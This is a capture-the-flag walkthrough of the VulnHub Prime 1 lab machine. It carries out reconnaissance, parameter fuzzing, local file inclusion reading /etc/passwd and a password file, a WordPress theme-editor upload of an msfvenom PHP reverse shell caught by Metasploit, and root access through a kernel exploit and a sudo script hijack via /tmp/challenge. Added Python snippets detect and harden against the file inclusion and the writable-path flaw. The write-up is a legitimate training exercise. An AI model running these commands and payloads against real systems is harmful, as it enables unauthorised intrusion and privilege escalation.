Prime 1 target machine penetration test

1. Environment setup

Target: prime1; download: https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

Attacker: Kali Linux 2023.2

Environment: VMware

Network: both machines on NAT

2. Information gathering

Subnet (class C) scan

nmap 192.168.XX.1/24

Port scan

nmap -sP 192.168.xx.xx

Ports 22 and 80 are open; visit http://192.168.48.131

The page is a single image: http://192.168.48.131/hacknpentest.png

Check http://192.168.48.131/robots.txt

wget http://192.168.48.131/hacknpentest.png
strings hacknpentest.png   // check whether the image carries hidden (steganographic) data
exiftool hacknpentest.png

Page source:

<html>
<title>HacknPentest</title>
<body>
 <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
</html>

The page source holds nothing of interest either, and the image carries no hidden data

3. Directory brute-forcing

dirb http://192.168.48.131

Visit http://192.168.48.131/dev

It hints that we need to dig further, so try brute-forcing specific file extensions

dirb http://192.168.48.131 -X .txt,.php,.rar,.zip,.tar

Three pages are found:

  • http://192.168.48.131/image.php
  • http://192.168.48.131/index.php
  • http://192.168.48.131/secret.txt

Visit each of them

4. Parameter brute-forcing

The hint says to use FUZZ to brute-force parameters on the two known PHP pages

wfuzz's default wordlists live in /usr/share/wfuzz/wordlist/

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 -u http://192.168.48.131/image.php?FUZZ=location.txt

No results

Try the other PHP page: http://192.168.48.131/index.php

Parameter found: file

Construct the URL: http://192.168.48.131/index.php?file=location.txt

curl http://192.168.48.131/index.php?file=location.txt

The response says secrettier360 is the parameter for the other PHP page

Construct: http://192.168.48.131/image.php?secrettier360=

The response confirms the parameter: finaly you got the right parameter

5. File disclosure

Try a file disclosure (local file inclusion) vulnerability: http://192.168.48.131/image.php?secrettier360=/etc/passwd

Visiting that address succeeds; the result:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin

It contains a hint: find password.txt file in my directory:/home/saket

http://192.168.48.131/image.php?secrettier360=/home/saket/password.txt

Fetch it with curl

It contains the string follow_the_ippsec. Recalling that this target was earlier found to host a WordPress site, or perhaps this is the SSH password; try SSH first

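
The secrettier360 parameter above hands whatever path the client supplies straight to the file read. As an added example (not code from the original post or from the box), the Python below contrasts that behaviour with an allowlisted resolver and scans constructed Apache access-log lines for the same kind of request; WEB_ROOT, ALLOWED_FILES and the log lines are assumptions for the example.

```python
import posixpath
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Assumptions for this example (the page shows neither): the document root
# image.php serves from, and the only files it is meant to hand out.
WEB_ROOT = "/var/www/html"
ALLOWED_FILES = {"location.txt", "secret.txt"}

def vulnerable_resolve(param: str) -> str:
    """Behaviour seen on the box: the parameter *is* the path to read."""
    return param

def hardened_resolve(param: str) -> Optional[str]:
    """Resolve only a bare, allowlisted filename under WEB_ROOT; None
    means the caller should answer 404 rather than go looking for it."""
    if not param or param != posixpath.basename(param):
        return None                  # rejects '/', '..' and any directory part
    if param not in ALLOWED_FILES:
        return None
    full = posixpath.normpath(posixpath.join(WEB_ROOT, param))
    if posixpath.commonpath([WEB_ROOT, full]) != WEB_ROOT:
        return None                  # belt and braces: still inside the root
    return full

def is_suspicious_value(value: str) -> bool:
    """A query value that looks like a path rather than a file name."""
    return value.startswith("/") or ".." in value or "\x00" in value

def flag_lfi_requests(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (parameter, value) pairs from Apache combined-log lines whose
    value looks like a file-disclosure attempt."""
    hits = []
    for line in log_lines:
        try:
            target = line.split('"')[1].split()[1]   # the request URI
        except IndexError:
            continue
        for name, values in parse_qs(urlsplit(target).query).items():
            hits.extend((name, v) for v in values if is_suspicious_value(v))
    return hits

# Constructed log lines mirroring the requests made in this walkthrough.
SAMPLE_LOG = [
    '192.168.48.130 - - [26/Jul/2023:18:47:14 +0800] "GET /index.php?file=location.txt HTTP/1.1" 200 512',
    '192.168.48.130 - - [26/Jul/2023:18:52:03 +0800] "GET /image.php?secrettier360=/etc/passwd HTTP/1.1" 200 2931',
    '192.168.48.130 - - [26/Jul/2023:18:58:26 +0800] "GET /image.php?secrettier360=../../../home/saket/password.txt HTTP/1.1" 200 40',
]
```

flag_lfi_requests(SAMPLE_LOG) returns only the two secrettier360 requests, and hardened_resolve refuses both of their values while still serving location.txt.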

6. WordPress vulnerability hunting

Try starting from WordPress

The WordPress version is 5.2.2 and Apache, seen earlier, is 2.4.18; search for known vulnerabilities

searchsploit wordpress 5.2
searchsploit apache 2.4

There are exploits, but I don't know how to use them. Keep working on WordPress

Scan the site with wpscan

wpscan --url http://192.168.48.131/wordpress/ -eu  // -eu enumerates the site's users

One user found: victor

Combine it with the password found earlier: follow_the_ippsec

Try logging in at http://192.168.48.131/wordpress/wp-login.php

Success!

Check whether the plugin page offers a file upload vector: http://192.168.48.131/wordpress/wp-admin/plugin-install.php

It does not, unfortunately, so look elsewhere

The theme editor has a PHP page that is writable

7. Reverse shell

Generate the reverse-shell payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.48.130 lport=4444 -o shell.php

Paste the PHP code into secret.php in the theme editor and click Update

The PHP code is now on the target; how do we execute it?

Construct the URL: http://192.168.48.131/wordpress/wp-content/themes/twentynineteen/secret.php

Before executing it, start the listener first

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.48.130
lhost => 192.168.48.131
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
Payload options (php/meterpreter/reverse_tcp):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.48.130   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
msf6 exploit(multi/handler) > exploit

Enter the URL constructed above in the browser address bar to execute the uploaded secret.php

Connection established

Upgrade the shell with Python

python -c 'import pty;pty.spawn("/bin/bash")'

Looking around: there is an enc file and a user.txt, but it's not yet clear how to use them; set them aside for now

www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
    (root) NOPASSWD: /home/saket/enc
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /home/saket/
www-data@ubuntu:/home/saket$ ls
enc  password.txt  user.txt
www-data@ubuntu:/home/saket$ cat user.txt
af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ cd enc
bash: cd: enc: Not a directory
www-data@ubuntu:/home/saket$ cat enc
cat: enc: Permission denied
www-data@ubuntu:/home/saket$ sudo /home/saket/enc
enter password: af3c658dcf9d7190da3153519c003456
www-data@ubuntu:/home/saket$ ls
enc  password.txt  user.txt

8. Privilege escalation via a kernel exploit

Check the kernel version and look for a matching kernel exploit:

www-data@ubuntu:/home/saket$ uname -r
4.10.0-28-generic

searchsploit linux 4.10

Upload the exploit (to /tmp, because every user has read and write access to /tmp)

upload /usr/share/exploitdb/exploits/linux/local/45010.c /tmp/45010.c
gcc 45010.c -o 45010
ls
42136.c
43345
43345.c
45010
45010.c
VMwareDnD
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-colord.service-YPzF2p
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-rtkit-daemon.service-YRRtS8
systemd-private-0e17a1cdd0484c2cb056cf711d2f2ea5-systemd-timesyncd.service-FzfPXv
vmware-root
chmod +x 45010
./45010
whoami
root   // privilege escalation succeeded
cd /root
ls
enc
enc.cpp
enc.txt
key.txt
root.txt
sql.py
t.sh
wfuzz
wordpress.sql
whoami
root
cat root.txt
b2b17036da1de94cfb024540a8e7075a   // flag obtained

9. Alternative solution: AES decryption

Solve it instead by decrypting with the enc program in /home/saket/

./enc
// it prompts for a password
Where would the password be? Try:
find / -name "*backup*" 2>/dev/null | sort | less

One candidate looks right: /opt/backup/server_database/backup_pass

Take a look

cat /opt/backup/server_database/backup_pass
// it yields a password:
your password for backup_database file enc is 

"backup_password"

Run ./enc and enter backup_password; it decrypts successfully and yields enc.txt and key.txt, which must be the ciphertext and the key

Ciphertext: "nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4="

Key: "366a74cb3c959de17d61db30591c39d1"

Plaintext: "Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"

Victor,"


Log in with saket:tribute_to_ippsec

Then run sudo -l to see which commands may be run as root

$ sudo -l
Matching Defaults entries for saket on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User saket may run the following commands on ubuntu:
    (root) NOPASSWD: /home/victor/undefeated_victor
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found  // hints that /tmp/challenge should be created
$ echo '#!/bin/bash' > challenge
$ echo '/bin/bash' >> challenge
$ chmod +x challenge
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
root@ubuntu:/root# cat root.txt
b2b17036da1de94cfb024540a8e7075a
// privilege escalation succeeded, flag obtained
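
The root cause here is a sudo-permitted script that runs /tmp/challenge by path: whoever can write to /tmp decides what runs as root. As an added audit example (not code from the original post or from the box), the Python below lists the absolute paths a script references whose parent directory is world-writable; the directory layout and script text are constructed stand-ins, since the real undefeated_victor is not shown on the page.

```python
import os
import re
import stat
import tempfile
from typing import List, Tuple

# Absolute paths as they appear in shell text (regex constructed for the example).
ABS_PATH = re.compile(r"/[A-Za-z0-9_./-]+")

def world_writable_dir(path: str) -> bool:
    """True if path is an existing directory whose mode grants 'other' write."""
    try:
        st = os.stat(path)           # follows symlinks, so /bin -> /usr/bin is what gets checked
    except OSError:
        return False
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)

def risky_paths_in(script_text: str) -> List[str]:
    """Absolute paths a sudo-permitted script references that sit in a
    world-writable directory: an unprivileged user can create or replace the
    target there, and sudo will then run it as root."""
    found = sorted(set(ABS_PATH.findall(script_text)))
    return [p for p in found if world_writable_dir(os.path.dirname(p))]

def make_sample_layout() -> Tuple[str, str]:
    """Constructed stand-in for the box: a mode-1777 directory playing the role
    of /tmp, and a script shaped like undefeated_victor that runs <dir>/challenge."""
    base = tempfile.mkdtemp()
    planted_dir = os.path.join(base, "tmp")
    os.mkdir(planted_dir)
    os.chmod(planted_dir, 0o1777)
    script = (
        "#!/bin/sh\n"
        'echo "if you can defeat me then challenge me in front of you"\n'
        f"{planted_dir}/challenge\n"
    )
    return planted_dir, script

if __name__ == "__main__":
    planted_dir, script = make_sample_layout()
    for p in risky_paths_in(script):
        print(f"{p}: parent directory {os.path.dirname(p)} is world-writable")
```

The fix on the sudoers side is the same in either case: a NOPASSWD target must only reference paths under root-owned, non-world-writable directories.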



  • 17
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值